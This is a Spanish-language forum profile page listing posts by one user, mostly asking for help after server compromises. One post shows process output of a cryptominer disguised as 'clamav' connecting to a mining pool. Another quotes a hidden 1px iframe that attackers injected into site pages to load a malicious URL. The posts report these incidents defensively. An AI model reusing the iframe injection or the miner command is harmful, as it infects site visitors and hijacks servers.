últimos mensajes de: Cronck

Mostrar Mensajes
Páginas: 1 2 [3]

Seguridad Informática / Seguridad / Servidor Linux comprometido

en: 3 Septiembre 2013, 18:52 pm

Buenas tardes a todo, el tema es...tengo un servidor web en donde tengo algunos sitios, pero ultimamente he tenido problemas con el.

Me han ingresado codigo en los index

Ve procesos corriendo como estos:

Código:

ps aux | grep clamav
apache     623 46.1  0.0  54784  1592 ?        Ssl  11:11   6:05 ./clamav -a scrypt -o http://pool-nvc.khore.org:9332 -O u8080.1:1 -B
apache     635 46.1  0.0  55808  1592 ?        Ssl  11:11   6:04 ./clamav -a scrypt -o http://pool-nvc.khore.org:9332 -O u8080.1:1 -B
apache     647 46.1  0.0  55808  1596 ?        Ssl  11:11   6:04 ./clamav -a scrypt -o http://pool-nvc.khore.org:9332 -O u8080.1:1 -B
apache     659 46.1  0.0  55808  1596 ?        Ssl  11:11   6:04 ./clamav -a scrypt -o http://pool-nvc.khore.org:9332 -O u8080.1:1 -B
root      1001  0.0  0.0   4016   668 pts/0    S+   11:24   0:00 grep clamav

Veo que en TMP hay varios archivos ocultos:

Código:

drwxr-xr-x  2 root  root     4096 Nov  6  2012 .autoinstaller
-rw-------  1 root  root    10518 Sep  2 16:17 .bash_history
-rw-r--r--  1 root  root       24 Jan  6  2007 .bash_logout
-rw-r--r--  1 root  root      191 Jan  6  2007 .bash_profile
-rw-r--r--  1 root  root      176 Jan  6  2007 .bashrc
-rw-r--r--  1 root  root        0 Sep  3 11:45 cron.php
-rw-r--r--  1 root  root      100 Jan  6  2007 .cshrc
drwx------  3 root  root     4096 Dec 29  2010 .gconf
drwx------  2 root  root     4096 Dec 29  2010 .gconfd
drwx------  2 root  root     4096 Sep  2 10:05 .gnupg
-rw-r--r--  1 root  root     1320 Dec  4  2002 jcameron-key.asc
-rw-------  1 root  root       73 Nov 26  2012 .lesshst
-rw-r--r--  1 root  root  2952318 Jul 23  2010 LINUX_32.tar.gz
-rw-------  1 root  root      168 Nov  5  2012 .mysql_history
-rw-------  1 root  root     1024 Jul 12  2012 .rnd
drwxr-xr-x  3 root  root     4096 Dec 29  2010 .sl-orig-configs
drwx------  2 root  root     4096 Jul 13  2012 .spamassassin
-rw-r--r--  1 root  root      129 Jan  6  2007 .tcshrc

Ya ejecute las aplicaciones para encontrar algun rootkit como son rkhunter y chkrootkit.

Pero no logro encontrar como se están infiltrando y sobre todo como elimininar esa infeccion.

Si alguien tiene alguna idea de como iniciar la busquera o algunas medidas que tenga que tomar para poder eliminar este mal de mi servidor..

Ya no se por donde investigar..se que me falta mucho por revisar pero no se por donde...

Saludos

22	Seguridad Informática / Seguridad / Ataque Servidore windows R2 2008	en: 18 Mayo 2013, 01:28 am
Buenas tardes a todos, nuevamente me da gusto regresar a este foro. En esta ocacion para consultar con ustedes un problema que he tenido en unos servidores, hace unos día tube un ataque a unos sitios que tengo en estos servidores, todos los nombres de los archivos están iguales, pero el contenido era distinto. Dentro de ello habian 2 lineas similares a estas: Código: <iframe width="1px" height="1px" src="http://ishigo.sytes.ne t/openstat/appropriate/promise-ourselves.php" style="display :block;" > Restaure toda la informacion y 2 dias despues google me bloqueo el sitio por tener contenido malicioso, al revisar el index, footer y header del sitio en las ultimas lineas contenía el código anterior. Actualmente estoy cambiando los sitios a otros servidores, para desechar estos con lo que tengo problemas. Pero me surgen las siguientes dudas. 1.- Que tipo de ataque a sido este? 2.- Como saber si realmente la información esta limpia al pasarla al otro servidor y poder salir de la lista negra de google 3.- Como prevenir estos acontecimientos. Realmente me sentí muy vulnerable, yo he usado linux mas de 10 años hacia atrás, y es mi primera ves que uso windows por requerimiento de estos sitios y no pude encontrar la solución del error. Saludos y gracias por sus comentarios

23	Comunicaciones / Redes / Re: Cisco y más..	en: 29 Agosto 2012, 18:11 pm
Hola esta muy bien el temario, si lo puedes bajar estaria chido... Ahora las siglas de abajo los cuales son CCNA 1, CCNA 2, CCNA 3 y CCNA 4, esto se refiere a certificaciones que otorga la marca y al parecer en esa documentación te trae los ejercicios de los examenes. Citar Examen de certificación del CCNA Los exámenes de certificación CCNA se ofrecen mundialmente a través de la certificadora Pearson VUE. En la página Web (http://www.pearsonvue.com/) se pueden encontrar los Centros de Evaluación Autorizados para cada país, el código del examen actual es 640-802. Para rendir el examen de certificación CCNA, requiere conocer las siguientes áreas: Modelo de OSI y comunicación en capas. Protocolos enrutados. Protocolos de enrutación. Servicios de WAN. Administración de redes. Tecnologías de LAN. Asi como existe el CCNA tambien estan estos: CCNP, CCDP, CCDA, CCIP saludos

24	Sistemas Operativos / GNU/Linux / Auditoria en servidor linux	en: 29 Agosto 2012, 16:22 pm
Buenos dias, me gustaria leer sus opiniiones sobre el siguiente tema. Necesito realizar un inventario de uno de los servidores que tengo, pues en días anteriores alguien me ha eliminado un Shell que había creado pero no logro encontrar que usuario fue. En teoria la unica persona que puede acceder por ssh soy yo, pero hay varios que acceden por ftp, y otros se conecta a las bases de datos. Si tienen alguna idea de como rastrear esos moviemiento se los agradecere. Saludos

Páginas: 1 2 [3]